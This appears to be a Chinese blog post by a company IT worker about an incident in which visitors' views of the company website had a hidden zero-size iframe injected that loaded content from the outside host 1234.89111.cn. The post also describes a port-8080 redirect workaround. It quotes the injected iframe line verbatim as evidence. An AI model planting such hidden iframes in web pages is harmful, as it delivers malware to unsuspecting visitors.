想起上周五的公司网页被篡改事件,就在google上搜索了下 "1234.89111.cn" ,发现受害的人很多,不仅仅是我们!
上周五早上上班的时候,有同事说公司网站访问不了,我try了一下,网页能打开,这时又有同事说打开网页杀毒软件报告有病毒。
扫描类型: 自动防护
扫描事件: 发现威胁!
威胁: Trojan.Anicmoo
文件: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0DMTIPOX\ad[1].jpg 位置: C:\Documents and Settings\
我正纳闷,公司的页面上怎么可能有病毒呢?此时我注意到IE工具栏上有提示阻止的cookie,点开一看,一个来自 1234.89111.cn 的cookie, 糟糕,我们跟这个什么 1234.89111.cn 素无往来,单从域名看就感觉它绝非善类。赶紧查看了一下网页的源代码,damn it, 开头处被加上了段html
<iframe src=http://1234.89111.cn/woyao.htm width=0 height=0></iframe>
立刻远处登陆,禁止了网站服务器的80端口,若有人访问我们网站中了招,可丢不起这个人。检查了一遍服务器上的页面,发现安然无恙,也没有发现什么可疑的进程,在服务器上本地访问了一下页面,发现并没有被加上这段恶毒的html。百思不得其解……
此时,有同事告诉我说,不仅仅访问我们的战点,访问其他站点也有这症状,我试着访问了下163.com ,个别页面也有类似情况。无奈……
经过一阵折腾,发现访问服务器上的非80端口的website,页面安然无恙。于是想到了暂时将公司网站重定向到非80端口的一个站点,来临时避开这个问题。
先新建一个站点,端口设置为80以外的一个可用的端口,如8080,本地目录等其他设置跟原来在80端口的站点一样,再将修改原来的站点的设置,将其重定向到这个新站点。这样一来,页面就暂时不会被恶毒的篡改。
是谁无耻到这样的地步,来篡改我们的网页,谁干的??
